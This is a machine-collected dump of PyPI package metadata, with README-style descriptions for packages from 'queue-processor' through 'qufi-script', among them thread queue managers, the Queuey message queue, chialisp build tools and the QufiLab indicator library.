"queue-processor", "pacakge-description": "queue_processor Python3 QueueHomepage:https://www.learningtopi.com/python-modules-applications/queue_processor/This package is a simple threading based queue manager. A queue can be created\nwith a specific maximum length as well as default command and final callback functions.\nWhen an item is added to the queue, the queue_processor will create a thread to execute\nthe command function that was either provided when the item was added, or the default\nfunction for the queue. Arguments will be passed to the function and the return\nvalue will be captured. If a funal callback function is provided, the return value\nas well as the status will be returned along with a copy of the arguments.The purpose of this class is to provide a modular and reusable queue that can be\nused in many different projects for any async tasks that need to be performed in\nsequence. The queue_processor operates as a FIFO queue and can provide a delay\nbetween tasks (i.e. for an IR transmitter where a pause is needed).Use Examplefrom queue_processor import QueueManager, STATUS_OK, STATUS_TIMEOUT, STATUS_EXPIRED, STATUS_QUEUE_FULL, STATUS_EXCEPTION\n\ndef task(arg1, arg2):\n print(f'executing task with {arg1}, {arg2}')\n return arg1\n\ndef finished_callback(return_value, status, *args, **kwargs):\n print(f'Completed task return value: {return_value}, status {status}, args: {args}, kwargs: {kwargs}')\n\nqueue = QueueManager(name='test1', command_func=task, callback_func=finished_callback)\nqueue.add(kwargs={'arg1': 1, 'arg2': 2})Command FunctionThe command function can be any callable function (including a function that is part of a class). The function will be passed all the positional and keyword arguments that are supplied when adding the instance to the queue.Callback FunctionThe callback function can be any callable function (including a function that is part of a class). This OPTIONAL function is called after the command function either completes or times out. The callback will provide the return value of the command function (if any) as well as a status that will be one of the following:OK: Command function completed (may or may not be successful in your view, but the function completed and did not raise any errors)TIMEOUT: If the command function did not complete within the timeout period.EXPIRED: The item was NOT executed as it sat in the queue longer than the max time permitted.QUEUE_FULL: This is returned if a callback is provided when an item is attempted to be added but the queue is full. This item is NOT executed.EXCEPTION: An exception was raised during the execution of the callback. The exception is returned as the \"return_value\"Callback function parametersThe callback function must accept the \"return_value\" and \"status\" as positional arguments in that order. It is strongly recommended to include *args and **kwargs to catch all positional and keyword arguments that are sent after \"return_value\" and \"status\". The queue processor will send ALL arguments to the callback function that were also sent to the command function.NOTE: You may send objects as parameters that will be updated by the command function! You may also have the command function be a member of a class instance. This allows you to act on data within an instance of a class so passing objects may not be required.!!IMPORTANT!! The queue processor uses Python threads. In your command and callback function be sure to use thread locks appropriately if modifying data that may be accessed by a different thread. Also be sure not to create deadlocks!"} +{"package": "queuepy", "pacakge-description": "PyQueueA simple module lib to queue your lists!Usage:# List: The list you are going to transform into a queue# Length: The maximum size of the queue# Input: The input from the user (can be a input('')) or an strQueue(list,length,input)# Returns the simple queueQueue(list,length,input).input()# Returns the element that was addedQueue(list,length,input).output()# Returns the element that was removedQueue(list,length,input).infos()# or .info()# Returns the queue, the input and the output of the queue.How it worksInsert the wanted string onto the list if the maximum size of the list is less than the wanted size.If the size of the list is greater than the wanted size, pop out the last queue element and insert the wanted string.TODO:Add.create()functionwill create 2 buffers for temporary usage.e.g:Queue(q, 3, in).create(1)creates a new bufferinsidetheQueueclassitselfcan use.input(),.output()and.infos()cannot be referenced outside theQueueclass.Double-ReferencereturnMethodsallows the user to referenceQueuewithout needing toprint()it.also allows the user to referenceQueuewithprint().graph TD\n A[Read the input] -->|Verify if the size is less than the wanted|B(Insert string on the first position)\n B --> C{Check the queue}\n C -->|If the size is less|D[Insert at 0 and move the rest]\n C -->|If size is greater|E[Insert at 0 and pop the last]\n E --> F\n D --> F\n F{Rest of args}\n F --> |.input|H(print the new element)\n F --> |.output|G(print the removed element)\n F --> |info / infos|I(print the queue, the input and the output)"} +{"package": "queueq", "pacakge-description": "No description available on PyPI."} +{"package": "queuery-client", "pacakge-description": "queuery_client_pythonQueuery Redshift HTTP API Client for PythonInstallationpip install queuery-clientUsagePrerequisitesSet the following envronment variables to connect Queuery server:QUEUERY_TOKEN: Specify Queuery access tokenQUEUERY_TOKEN_SECRET: Specify Queuery secret access tokenQUEUERY_ENDPOINT: Specify a Queuery endpoint URL via environment variables if you don't set theendpointargument ofQueueryClientin you codeBasic Usagefromqueuery_clientimportQueueryClientclient=QueueryClient(endpoint=\"https://queuery.example.com\")response=client.run(\"select column_a, column_b from the_great_table\")# (a) iterate `response` naivelyforelemsinresponse:print(response)# (b) invoke `read()` to fetch all recordsprint(response.read())# (c) invoke `read()` with `use_pandas=True` (returns `pandas.DataFrame`)print(response.read(use_pandas=True))Type CastBy default,QueueryClientreturns all values asstrregardless of their definitions on Redshift.\nYou can use theenable_castoption to automatically convert types of the returned values into appropreate ones based on their definitions.fromqueuery_clientimportQueueryClientclient=QueueryClient(endpoint=\"https://queuery.example.com\",enable_cast=True,# Cast types of the returned values automatically!)sql=\"select 1, 1.0, 'hoge', true, date '2021-01-01', timestamp '2021-01-01', null\"response=client.run(sql)response.read()# => [[1, 1.0, 'hoge', True, datetime.date(2021, 1, 1), datetime.datetime(2021, 1, 1, 0, 0), None]]"} +{"package": "queues", "pacakge-description": "UNKNOWN"} +{"package": "queue_skardash", "pacakge-description": "UNKNOWN"} +{"package": "queue_status", "pacakge-description": "UNKNOWN"} +{"package": "queue-system", "pacakge-description": "No description available on PyPI."} +{"package": "queuetools", "pacakge-description": "This package provides the following scripts, which can configure AMQP brokers\nsuch as RabbitMQ:mkq - declares queues (queue.declare)mkx - declares exchanges (exchange.declare)bindq - binds queues to exchanges (queue.bind)unbindq - unbinds queues from exchanges (queue.unbind)rmq - removes queues (queue.delete)rmx - removes exchanges (exchange.delete)qcat - prints messages to stdout (channel.basic_consume)qpurge - purges all messages from a queue (channel.queue_purge)hammer - submits messages from the command line (channel.basic_publish)"} +{"package": "queue-tweets", "pacakge-description": "stream tweets to a queue for a finite amount of time that can be parallelized with a consumption process"} +{"package": "queueup", "pacakge-description": "QueueUp - A simple and easy queue interface for all of your needsQueueUp-- Is an entirely integrated queue interface over kombu to completely include all settings inside of a single object.The reason we usekombuand AMQP as a whole is to allow for complex objects and delivery guaruntees we normally wouldn't get with much newer platforms.Differences from QueueUp and QueueYou'd use theQueueUplibrary in the exact way you'd use thequeue.Queuelibrary. Let's look at the difference.An example for python'squeueimporttimeimportrandomimportthreadingfromqueueimportQueue# We're starting two threading daemons,# 1. one that pushes information into a queue,# 2. the other that reads information from the queue then publishes itdefqueue_pusher(q):whileTrue:q.put(random.randint(0,1000))time.sleep(0.05)defqueue_reciever(q):whileTrue:qitem=q.get(block=True)print(f\"Printing{item}\")time.sleep(0.05)if__name__==\"__main__\":common_queue=Queue()threading.Thread(target=queue_pusher,daemon=True,args=(common_queue,)).start()threading.Thread(target=queue_reciever,daemon=True,args=(common_queue,)).start()# Now the two queues will communicate with each other.whileTrue:time.sleep(5)An example forQueueUpimporttimeimportrandomimportthreadingfromqueueupimportQueue# We're starting two threading daemons,# 1. one that pushes information into a queue,# 2. the other that reads information from the queue then publishes itdefqueue_pusher(q):whileTrue:q.put(random.randint(0,1000))time.sleep(0.05)defqueue_reciever(q):whileTrue:qitem=q.get(block=True)print(f\"Printing{item}\")time.sleep(0.05)if__name__==\"__main__\":common_queue=Queue()# w/o parameters it returns a multiprocessing.Queue()threading.Thread(target=queue_pusher,daemon=True,args=(common_queue,)).start()threading.Thread(target=queue_reciever,daemon=True,args=(common_queue,)).start()# Now the two queues will communicate with each other.whileTrue:time.sleep(5)"} +{"package": "queue-util", "pacakge-description": "queue_utilA set of utilities for consuming (and producing) from a rabbitmq queueEnd of lifeThis project is not actively developed any more.Kombu has provided the ConsumerMixin utility for a very long time now. That abstraction allows to\ncode Consumers very similar to the one provided here with very little code, and much better\nhandling of errors, disconnections and the full range of features that Kombu has on offer.If you are still actively using this library and need support for it, please get in touch\nwith a GitHub issue or an email.DevelopmentTestingYou will need to have:a localDockerservicetoxinstalled (globally available)All supported versions of python installed (Pyenvis highly\nrecommended)tox [-p auto]ReleaseUpdateCHANGELOGto add new version and document itIn GitHub, create a new releaseName the releasev(for examplev1.2.3)Title the release with a highlight of the changesCopy changes in the release fromCHANGELOG.mdinto the release descriptionTravisCIwill package the release and publish it toPypi"} +{"package": "queue-utilities", "pacakge-description": "queue-utilitiesLet's make using Queues great again! Queue utilities and conveniences for those using sync libraries.Currently implements using threads and threading queues as standard, multiprocessing queues can be used by passing in relevant multiprocessing.Queue arguments. Worker threads use threading.Thread not multiprocessing.Process by design, if you require running eg Select in an external process as a message broker I recommend spawning a Process and then using as is documented.This utilities package contains the following classes:Pipe- Pipe messages from one queue to another.Timer- Threaded timer that emits time on internal or provided queue after given wait time period. Can be cancelled.Ticker- Same as timer but emits time at regular intervals until stopped.Multiplex- Many-to-One (fan-in) queue management helper.Multicast- One-to-Many (fan-out) queue management helper.Select- Like Multiplex but output payload contains message source queue to be used in dynamic message based switching. Inspired by Golangs select statements using channels.as_thread- Decorator to run function in thread.with_input_queue- Decorator to attach input and optional output queues to function which will be run in a thread.with_output_queue- Decorator that sends function results to output queue.Note that this package is early stages of development.Installationpython3-mpipinstallqueue-utilitiesUsagePipefromqueue_utilitiesimportPipeoriginal_q,output_q=_queue.Queue(),_queue.Queue()p=Pipe(original_q,output_q)# put an item into the original queueoriginal_q.put(1)# get the message off the output queuerecv=output_q.get()print(recv)# 1# don't forget to stop the pipe after you've finished.p.stop()Timerfromqueue_utilitiesimportTimer# emit time after 5 secondsfive_seconds=Timer(5)five_seconds.get()# cancel a timerto_cancel=Timer(60)print(to_cancel._is_finished)# Falseto_cancel.stop()print(to_cancel._is_finished)# TrueTickerfromqueue_utilitiesimportTicker# print the time every 5 seconds 4 timestick=Ticker(5)for_inrange(4):print(f\"The time is:{tick.get()}\")# cancel the ticker threadtick.stop()Multiplexfromqueue_utilitiesimportMultiplexfromqueueimportQueue# create two queues and pass them into the Multiplexqueue_a,queue_b=Queue(),Queue()multi_p=Multiplex(queue_a,queue_b)# send messages to any of the queuesqueue_a.put(\"a\")queue_b.put(\"b\")# read the messagesfor_inrange(2):message=multi_p()# or multi_p.get()print(f\"I got a message!{message}\")# cleanupmulti_p.stop()# if you try to read a message after stop# it raises a MultiplexClosed exceptionmulti_p.get()Multicastfromqueue_utilitiesimportMulticastfromqueueimportQueueout_a,out_b=Queue(),Queue()multicast=Multicast(out_a,out_b)multicast.send(\"A message!\")forqin(out_a,out_b):print(q.get())# prints \"A message!\" twice!multicast.stop()SelectUse with context to build a cancellable threadfromqueue_utilitiesimportSelectfromqueueimportQueuefromthreadingimportThreadout_a,cancel_sig=Queue(),Queue()defselector(*queues):withSelect(*queues)asselect:forwhich,messageinselect:ifwhichiscancel_sig:# stop select on any message on queue bselect.stop()else:print(f'Got a message{message}')Thread(target=selector,args=(out_a,cancel_sig)).start()out_a.put(1)out_a.put(2)out_a.put(3)cancel_sig.put('Bye')Timeout a function with TimerfromthreadingimportThreadimporttimefromqueueimportQueuefromqueue_utilitiesimportSelect,Timerdefdo_something_slow(q:Queue)->None:# do something slowtime.sleep(3)q.put(\"Done\")output_q=Queue()Thread(target=do_something_slow,args=(output_q,)).start()timeout=Timer(2)select=Select(output_q,timeout._output_q)for(which_q,result)inselect:ifwhich_qisoutput_q:print(\"Received result\",result)else:print(\"Function timed out!\")breakselect.stop()as_threadfromqueue_utilitiesimportas_threadimporttime@as_threaddefsleeper():time.sleep(5)print('Goodbye!')sleeper()print('Waiting...')time.sleep(6)print('Done!')with_input_queuefromqueue_utilitiesimportwith_input_queuefromqueueimportQueuework_queue=Queue()result_queue=Queue()@with_input_queue(work_queue,result_queue)defsquarer(input:int):returninput**2foriinrange(10):work_queue.put(i)print(f'{i}squared is{result_queue.get()}')with_output_queuefromqueue_utilitiesimportwith_input_queuefromqueueimportQueueresult_queue=Queue()@with_output_queue(result_queue)defsquarer(input:int):returninput**2foriinrange(10):squarer(i)print(f'{i}squared is{result_queue.get()}')ContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.LicenseMIT"} +{"package": "queue_utils", "pacakge-description": "Utils for creating microservices around RabbitMQ"} +{"package": "queue-worker-local", "pacakge-description": "This is a package for sharing common crud operation to queue schema in the db"} +{"package": "queuey", "pacakge-description": "Read the full documentation athttp://queuey.readthedocs.org/Wat? Another message queue?Given the proliferation of message queue\u2019s, one could be inclined to believe\nthat inventing more is not the answer. Using an existing solution was\nattempted multiple times with most every existing message queue product.The others failed (for our use-cases).Queuey is meant to handle some unique conditions that most other message\nqueue solutions either don\u2019t handle, or handle very poorly. Many of them for\nexample are written for queues or pub/sub situations that don\u2019t require\npossibly longer term (multiple days) storage of not just many messages but\nhuge quantities of queues.Queuey Assumptions and Features:Messages may persist for upwards of 3 daysRange scans with timestamps to rewind and re-read messages in a queueMillions of queues may be createdMessage delivery characteristics need to be tweakable based on the\nspecific cost-benefit for a Queuey deploymentHTTP API for easy access by a variety of clients, including AJAXAuthentication system to support multiple \u2018Application\u2019 access to Queuey\nwith optional Browser-ID client authenticationA single deployment may support multiple Applications with varying\nmessage delivery characteristics, and authentication restricted queue\naccessQueuey can be configured with varying message guarantees, such as:Deliver once, and exactly onceDeliver at least once (and under rare conditions, maybe more)Deliver no more than once (and under rare conditions, possibly not deliver)Changing the storage back-end and deployment strategies directly affects\nthe message guarantee\u2019s. This enables the Queuey deployment to meet different\nrequirements and performance thresholds.For more background on Queuey, seethe Mozilla wiki section on queuey.RequirementsMake sure you have the following software already\ninstalled before proceeding:Java 1.6AntMakePython 2.7 (with virtualenv installed)InstallationAfter downloading the repository for the first time,\ncd into the directory and run:$ makeThis will do the following:Create a virtual python environmentInstall required python packages into this environmentCassandraTo run Queuey, you need a storage back-end for the queues. The default\nstorage back-end is Cassandra. This installation has been automated in\nQueuey\u2019s Makefile, to install Cassandra in the same directory as\nQueuey:make cassandraWhich will fetch the Cassandra server and set up the configuration.The default (Cassandra) stores its data and files inside the local Cassandra\ndirectory so as not to interfere with any existing Cassandra installations on\nthe system.RunningRunning the Cassandra Server:The message store (used by the server to route messages)\nand the HTTP server must be started separately. The steps\nare (starting from the root project directory)./bin/cassandra/bin/cassandra -p cassandra.pidTo shut it down at any point in the future:kill -2 `cat cassandra.pid`Running the Queuey Application:It is recommended that you copy theetc/queuey-dev.inifile to/etc/queuey.ini. This will prevent accidental loss of configuration\nduring an update.bin/pserve etc/queuey.iniTroubleshooting:\u201cUpgrading\u201d Queuey may require reinitializing the schema. To reinitialize the\nschema, remove all data files. The new correct schema will be automatically\ncreated during the next Queuey startup.Stop Cassandra:kill -2 `cat cassandra.pid`Remove the Cassandra data directory (not the Cassandra binary directory):rm -rf ./cassandraStart Cassandra:./bin/cassandra/bin/cassandra -p cassandra.pidChangelog0.8 (2012-08-28)FeaturesCompatibility with Cassandra 1.1Add new API\u2019s to get, post and update messages by their message idAdd new memory storage backend for testing purposes.Add metlog based metrics logging.Use pycassa\u2019s system manager support to programmatically create the\nCassandra schema during startup.Bug fixesFix precision errors in server side message id to timestamp conversion.Enforce message keys to be valid UUID1 instead of just any UUID."} +{"package": "queuey-py", "pacakge-description": "queuey-py: Python client library for QueueyThis is a Python client library used for interacting with messages from aMozilla Services message queue(http://queuey.readthedocs.org/).DocumentationYou can read the documentation athttp://queuey-py.readthedocs.org/Changelog0.2 (2012-08-28)Test against a Queuey 0.8 release.Documentation tweaks and updates.0.1 (2012-07-10)Changesinceargument of themessagesmethod to deal with message ids\nrather than imprecise timestamps.Code extracted from qdo."} +{"package": "queuing", "pacakge-description": "queuingMultithreating producent-consumer solutionExampleimportqueuingimporttimeimportlogginglogging.basicConfig(level=logging.DEBUG,format='%(asctime)s[%(levelname)5s]%(name)s%(message)s')@queuing.consumer(instances=5)defm1(no):time.sleep(1)print(\"m1{}\".format(no))queuing.broker.send('m2',{'no':no,'sqno':no*no,})[queuing.broker.send('m3',{'no':no,})foriinrange(0,10)]@queuing.consumer(instances=2)defm2(no,sqno):time.sleep(2)print(\"m2{}{}\".format(no,sqno))@queuing.consumer(instances=1)defm3(no):print(\"m3{}\".format(no))if__name__=='__main__':foriinrange(0,10):queuing.broker.send('m1',{'no':i})queuing.broker.loop()"} +{"package": "queuing-hub", "pacakge-description": "queuing-hubMulti-cloud Queuing Hub for PythonDescriptionThis is a wrapper tool for AWS SQS and Google Cloud PubSub(Topic and pull subscription) with transparent interface.Easy messaging redundancy.Improve fault tolerance by avoiding queues becoming SPOFsDuplicate production messages to test environment for debuggingInstallRequirementspython = \"^3.6\"google-cloud-pubsub = \"^2.4.0\"google-cloud-monitoring = \"^2.0.1\"boto3 = \"^1.17.18\"UsagePublisherfromqueuing_hub.publisherimportPublisherpub=Publisher()# Send a message to all queues accessible by defaultresponse=pub.push(topic_list=pub.topic_list,body='Hello world!')Subscriberfromqueuing_hub.subscriberimportSubscribersub=Subscriber()# Receive messages with list ascending priority from queues accessible by defaultresponse=sub.pull(sub_list=sub.sub_list,max_num=1,ack=True)Forwarderfromqueuing_hub.forwarderimportForwarderfwd=Forwarder(sub=sub.sub_list[0],topic=pub.topic_list[0],max_num=1)# copy messageresponse_0=fwd.pass_through()# move messageresponse_1=fwd.transport()"} +{"package": "queuinx", "pacakge-description": "QueuinxQueuinx is an implementation of some queuing theory results in JAX that is differentiable and accelerator friendly.\nThe particular focus is on networks of finite queues solved by fixed point algorithm of a RouteNetStep step.\nThe API if designed to follow Jraph.QT meets MLThe use of JAX a machine learning framework as the basis for the implementation allows the use of\nadvanced computational tool like differentiable programming, compilation or support for accelerator.Instalationpip install git+https://github.com/krzysztofrusek/queuinx.gitor from pypipip install queuinxIf you decide to apply the concepts presented or base on the provided code, please do refer our paper.@ARTICLE{9109574,\n author={K. {Rusek} and J. {Su\u00e1rez-Varela} and P. {Almasan} and P. {Barlet-Ros} and A. {Cabellos-Aparicio}},\n journal={IEEE Journal on Selected Areas in Communications}, \n title={RouteNet: Leveraging Graph Neural Networks for Network Modeling and Optimization in SDN}, \n year={2020},\n volume={38},\n number={10},\n pages={2260-2270},\n doi={10.1109/JSAC.2020.3000405}\n}Documentation"} +{"package": "quevedo", "pacakge-description": "QuevedoQuevedo is a python tool for creating, annotating and managing datasets of\ngraphical languages, with a focus on the training and evaluation of machine\nlearning algorithms for their recognition.Quevedo is part of theVisSE project. The code can\nbe found atGitHub, anddetailed\ndocumentation here.FeaturesDataset management, including hierarchical dataset organization, subset\npartitioning, and semantically guided data augmentation.Structural annotation of source images using a web interface, with support for\ndifferent users and the live visualization of data processing scripts.Deep learning network management, training, configuration and evaluation,\nusingdarknet.InstallationQuevedo requirespython >= 3.7, and can be installed fromPyPI:$pipinstallquevedoOr, if you want any extras, like the web interface:$pipinstallquevedo[web]Or directly from the wheel in therelease\nfile:$pipinstallquevedo-{version}-py3-none-any.whl[web]You can test that quevedo is workingTo use the neural network module, you will also needto install\ndarknet.UsageTo create a dataset:$quevedo-Dpath/to/new/datasetcreateThen you cancdinto the dataset directory so that the-Doption is not\nneeded.You can also download an example dataset from this repository\n(examples/toy_arithmetic), or peruse ourCorpus of Spanish\nSignwriting.To see information about a dataset:$quevedoinfoTo launch the web interface (you must have installed the \"web\" extra):$quevedowebFor more information, and the list of commands, runquevedo --helporquevedo --helpor seehere.DevelopmentTo develop on quevedo, we usepoetryas our environment, dependency and build\nmanagement tool. In the quevedo code directory, run:$poetryinstallThen you can run quevedo with$poetryrunquevedoDependenciesQuevedo makes use of the following open source projects:python 3poetrydarknetclickflaskpreactjsAdditionally, we use thetomlandforcelayoutlibraries, and build our\ndocumentation withmkdocs.AboutQuevedo is licensed under theOpen Software License version\n3.0.The web interface includes a copy ofpreactjsfor ease of offline use, distributed\nunder theMIT License.Quevedo is part of the project\"Visualizando la SignoEscritura\" (Proyecto VisSE,\nFacultad de Inform\u00e1tica, Universidad Complutense de\nMadrid)as part of the\nprogram for funding of research projects on Accesible Technologies financed by\nINDRA and Fundaci\u00f3n Universia. An expert system developed using Quevedo is\ndescribedin this article.VisSE teamAntonio F. G. Sevillaafgs@ucm.esAlberto D\u00edaz EstebanJose Mar\u00eda Lahoz-Bengoechea"} +{"package": "quex-chia-base", "pacakge-description": "chia_base: base data types for chia coins, spends and contract developmentensconsThis package usesensconswhich usesSConsto build rather than the commonly usedsetuptools."} +{"package": "quex-chialisp-builder", "pacakge-description": "Chialisp BuilderUse this wheel in conjunction withruntime_builderto manage building of chialisp at build time or during development.UseAddchialisp_builderas a buildtime dependency and a development-time dependency. Don't add it as a runtime dependency, as the clvm.hexfiles should be built and included with the wheel. The source does not need to be.Addchialisp_loaderas a runtime dependency to get theload_programfunction, which will call the building function if present (as it should be at development time.)FAQWhy isn't this included as part ofruntime_builder?Theruntime_builderwheel is intended to provide a general solution for non-python artifacts. Although Chialisp build was the inspiration forruntime_builder, it's just one potential use. This wheel is the specific implementation of chialisp builds for use withruntime_builder."} +{"package": "quex-chialisp-loader", "pacakge-description": "chialisp_loaderThis tiny wheel exportsload_program, which is used to loadchialispprograms from resources included with python wheels.Chialisp.clspfiles are compiled into.hexoutput. Only.hexoutput files need to be included in binary wheelsWhenload_programis called, it tries to importchialisp_builder. If it fails, it assumes this is running at deploy time: any.clspfiles are ignored, and the corresponding program is loaded from the.hexfile."} +{"package": "quex-chialisp-puzzles", "pacakge-description": "chialisp_puzzlesThis project contains several standard and legacy puzzles commonly used on the chia network.Note that it usesensconsto build, as the more commonly usedsetuptoolsdoes not easily allow fine-grained control of the contents of thesdistandwheelfiles.In particular, this example takes pains to include the source filesruntime_buildor*.clspin the sdist but not the wheel.UseTo load a puzzle, do something likefromchialisp_puzzlesimportload_puzzleprogram=load_puzzle(\"p2_delegated_puzzle_or_hidden_puzzle\")LicenseThis project is licensed under the Apache 2 License. See the LICENSE file for more details."} +{"package": "quex-hsms", "pacakge-description": "HSMS: hardware security module software/simulatorThis project is intended to run on an air-gapped computer to sign chia spends using bls12_381 keys.Install$ pip install -e .If on windows, you need one extra package:$ pip install pyreadlineToolsCommand-line tools installed include:hsms- HSM sim that acceptsUnsignedSpendobjects and produces signatures, full or partialhsmgen- generate secret keyshsmpk- show public keys for secret keyshsmmerge- merge signatures for a multisig spendqrint- convert binary to/from qrint asciiFor testing & debugging:hsm_test_spend- create a simple testUnsignedSpendmultisig spendhsm_dump_sb- debug utility to dump information about aSpendBundlehsm_dump_us- debug utility to dump information about anUnsignedSpend"} +{"package": "quex-runtime-builder", "pacakge-description": "Runtime BuilderSometimes python developers want to include compiled output or other binary blob artifacts in their wheels. The source materials for this output is checked into git, but the blobs are not, since they're not source material and are at risk getting out of sync with the source distribution.When building the wheel, the blobs need to be generated. But it may also be nice to rebuild the blobs if the source have changed at runtime to automate a step of the edit/test cycle.This project lets you declare a single configuration describing how to build the artifacts, and build them at runtime during the development cycle or at wheel build time.ExampleThere are example projects intests/project_template_ensconsandtests/project_template_setuptools.tests/project_template_setuptools\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 proj\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 bar.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 foo.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 run_test.py\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 runtime_build\n\u251c\u2500\u2500 pyproject.toml.template\n\u251c\u2500\u2500 setup.py\n\u251c\u2500\u2500 test_pip_install.sh\n\u2514\u2500\u2500 test_pip_install_editable.shThis examples usessetuptoolsandsetup.pyto build. Thesetup.pyandruntime_buildfiles work together to make available artifacts built from the.sourcefiles.project_template_enscons\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 SConstruct\n\u251c\u2500\u2500 proj\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 bar.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 foo.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 run_test.py\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 runtime_build\n\u251c\u2500\u2500 pyproject.toml.template\n\u251c\u2500\u2500 test_pip_install.sh\n\u2514\u2500\u2500 test_pip_install_editable.shNote that this example usesensconsto build, assetuptoolsdoes not easily allow fine-grained control of the contents of thesdistandwheelfiles. In particular, this example takes pains to include the source filesruntime_build,foo.sourceandbar.sourcein the sdist but not the wheel.ConfigurationArtifacts to be build must be declared in aruntime_buildfile located in the destination module of the artifacts. Each submodule can have zero or one of these build files. In theproject_templateexample above,bar.sourceandfoo.sourceeach produce an output in theprojsubmodule, andruntime_builddefines what the artifacts are.This configuration file can be loaded at build time or at run time, so itcannotimport anything that isn't made available in thebuild-system.requiressection ofpyproject.toml. In particular, it cannot import anything from the project being built since it has to be built before it can be installed in the build package, leading to a bootstrap problem.Here is the example from above:frompathlibimportPathfromtypingimportCallableclassMultiplyBuild:def__init__(self,factor:int)->None:self.factor=factordef__call__(self,target_path:Path):source_path=target_path.with_suffix(\".source\")t=int(open(source_path).read())withopen(target_path,\"w\")asf:f.write(f\"{t*self.factor}\")defcount_build(target_path:Path)->None:source_path=target_path.with_suffix(\".source\")t=open(source_path).read()withopen(target_path,\"w\")asf:f.write(f\"{len(t)}\\n\")BUILD_ARGUMENTS:dict[str,Callable[[Path],None]]={\"foo.val\":MultiplyBuild(50),\"bar.count\":count_build,}The key is to return adictobject calledBUILD_ARGUMENTSthat hasstrkeys corresponding to artifacts, andCallablevalues. TheCallableshould generate the given artifact.These examples could potentially build the artifacts every time they are referenced. If a build takes long enough, you may want to add code to only build when necessary to speed the edit/test cycle.Build-timeTheruntime_builderwheel is primarily a build-time dependency. If you want to take advantage of the run-time building, you need to install it in your runtime virtual environment. However, it generally should not be installed in the release version of your package.Add it to yourpyproject.tomlfile:[build-system]requires=[\"runtime_builder\",...]In theSConstructfile is the following line:built_items = build_all_items_for_package(\"proj\")This returns the list of artifacts as a list ofPathobjects. These files must be included in the final wheel.RuntimeTo use the dynamic build capabilities at runtime, use something like this boilerplate function:try:fromruntime_builderimportbuild_on_demandexceptImportError:# `runtime_builder` is an optional dependency for development onlydefbuild_on_demand(*args):passdefload_resource(resource_path:str,package:Package,)->bytes:build_on_demand(package,resource_path)withas_file(files(package).joinpath(resource_path))astarget_path:returntarget_path.read_bytes()This checks for presence ofruntime_builder, and invokes it if available before accessing the resource."} +{"package": "qufia", "pacakge-description": "Qufia Python SDKThe Python SDK for the qufia api"} +{"package": "qufilab", "pacakge-description": "QufiLabQufilab is a fast and modern technical indicators library\nimplemented in c++.FeaturesWide array of technical indicators.InstallationNotyetimplementedDocumentation for QufiLab can be found at:https://qufilab.readthedocs.ioUsageWARNING: All of qufilab's technical indicators are implemented in c++\nand a big part of the speed performance comes from the fact that no\ntype conversion exist between python and c++. In order for this to work, numpy arrays\nof typenumpy.dtype.float64 (double) or numpy.dtype.float32 (float)are preferably used. Observe that all other types of numpy arrays still are accepted, however the retured numpy array will be converted into the typenumpy.dtype.float64.Indicatorsimportqufilabasqlimportnumpyasnp# Creates an ndarray with element type float64.data=np.random.rand(1000000)# Calculate sma with a period of 200.sma=ql.sma(data,period=200)# Calculate bollinger bands with a period of 20 and two standard deviations from the mean.upper_band,middle_band,lower_band=ql.bbands(data,period=20,deviation=2)"} +{"package": "qufi-script", "pacakge-description": "\u12a5\u1295\u12b3\u1295 \u1260\u12f0\u1205\u1293 \u1218\u1321\u1218\u130d\u1262\u12eb\u12a5\u1295\u130d\u12f4 \u1203\u1308\u122b\u127d\u1295 \u12a2\u1275\u12ee\u1335\u12eb \u12e8\u122b\u1237 \u12e8\u1206\u1291 \u1261\u12d9 \u1290\u1308\u122e\u127d \u12a0\u120f\u1275\u1365 \u12a8\u1290\u12da\u1205\u121d \u12a0\u1295\u12f1\u1293 \u12cb\u1290\u129b\u12cd \u134a\u12f0\u120e\u127f \u1293\u1278\u12cd\u1362 \u1206\u1296\u121d \u130d\u1295 \u12a5\u1290\u12da\u1205 \u134a\u12f0\u120e\u127d \u1260\u1270\u12c8\u1230\u1291 \u124b\u1295\u124b\u12ce\u127d \u120b\u12ed \u1325\u1245\u121d \u120b\u12ed \u1232\u12cd\u120d\u1365 \u12a0\u1295\u12f3\u1295\u12f5 \u124b\u124b\u12ce\u127d \u12f0\u1308\u121e \u1260\u1263\u12d5\u12f3\u1295 \u1203\u1308\u122b\u1275 \u134a\u12f0\u120d \u12ed\u1320\u1240\u121b\u1209\u1364 \u12a8\u1290\u12da\u1205\u121d \u12a0\u1295\u12f1 \u12a6\u122e\u121d\u129b (\u12a0\u134b\u1295 \u12a6\u122e\u121e) \u1290\u12cd\u1362 \u12e8\u12a6\u122e\u121d\u129b \u124b\u1295\u124b \u1260\u130d\u12d5\u12dd \u134a\u12f0\u120b\u1275 \u12a5\u1295\u12f3\u12ed\u1320\u1240\u121d \u12a8\u121a\u12eb\u12f0\u1228\u1309\u1275 \u12cb\u1293 \u1290\u1308\u122e\u127d \u12a0\u1295\u12f1\u1366 \u1260\u12a0\u134b\u1295 \u12a6\u122e\u121e \u124b\u1295\u124b \u12cd\u1235\u1325 10 \u12f5\u121d\u133e\u127d \u1232\u1296\u1229\u1365 \u12e8\u130d\u12d5\u12dd \u134a\u12f0\u120d \u130d\u1295 \u12eb\u1208\u12cd 7 \u12f5\u121d\u133e\u127d \u1265\u127b \u1293\u1278\u12cd\u1362\u1235\u1208\u12da\u1205 \u12ed\u1205\u1295 \u127d\u130d\u122d \u1260\u1218\u1228\u12f3\u1275 \u1263\u1209\u1275 \u134a\u12f0\u120b\u1275 \u120b\u12ed \u12a8\u120b\u12ed \u12a0\u1295\u12f5 \u1290\u1325\u1265 \u1260\u121b\u12f5\u1228\u130d \u12a5\u1290\u129a\u1205 \u12e8\u1240\u1229\u1275 \u134a\u12f0\u120d(\u12f5\u121d\u133e\u127d) \u1270\u1328\u121d\u1228\u12cd\u1260\u1275\u1365 \u1260\u1240\u120b\u1209 \u12e8\u12a0\u134b\u1295 \u12a6\u122e\u121e\u1295 \u124b\u1295\u124b \u1260\u1203\u1308\u122b\u127d \u134a\u12f0\u120d \u1218\u133b\u134d 